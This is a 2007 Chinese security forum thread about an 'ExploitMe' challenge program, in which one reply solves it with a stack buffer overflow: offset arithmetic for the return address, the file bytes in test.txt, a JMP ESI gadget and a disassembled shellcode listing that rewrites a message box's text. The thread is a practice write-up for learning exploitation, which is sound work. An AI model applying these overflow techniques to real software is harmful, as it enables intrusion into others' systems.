首页
社区
课程
招聘
ExploitMe
发表于: 2007-8-28 16:05 7574

ExploitMe

2007-8-28 16:05
7574
收藏
免费 0
支持
分享
最新回复 (3)
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
2
验证通过~~
2007-8-28 16:13
0
雪    币: 367
活跃值: (42)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
RET 地址和加载的代码偏移0x30字节,由(0x30+4)/4=0xD
test.txt前8字节取F7 97 95 09 00 00 00 00
计算得到CX=0x0D
0xd*4-4偏移处即函数返回地址
选4002B8 Jmp ESI
ESI即申请的内存空间
ESI=0x1030000
01030000   /EB 7C           JMP     SHORT 0103007E
01030002   |8980 1C1C1C1C   MOV     DWORD PTR DS:[EAX+1C1C1C1C], EAX
01030008   |8D6C24 20       LEA     EBP, DWORD PTR SS:[ESP+20]
0103000C   |C705 68024000 4>MOV     DWORD PTR DS:[ExploitM.Caption], 214B4F
01030016   |C705 60024000 4>MOV     DWORD PTR DS:[ExploitM.Text], 214B4F
01030020   |59              POP     ECX                                                   ; 01030000
01030021   |59              POP     ECX                                                   ; 01030000
01030022   |68 83034000     PUSH    400383
01030027   |C3              RETN
.
.
.0103007E  jmp 01030008
2007-8-28 16:31
0
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
4
100.07052951388888888888888888889
2007-9-2 21:35
0
游客
登录 | 注册 方可回帖
返回
//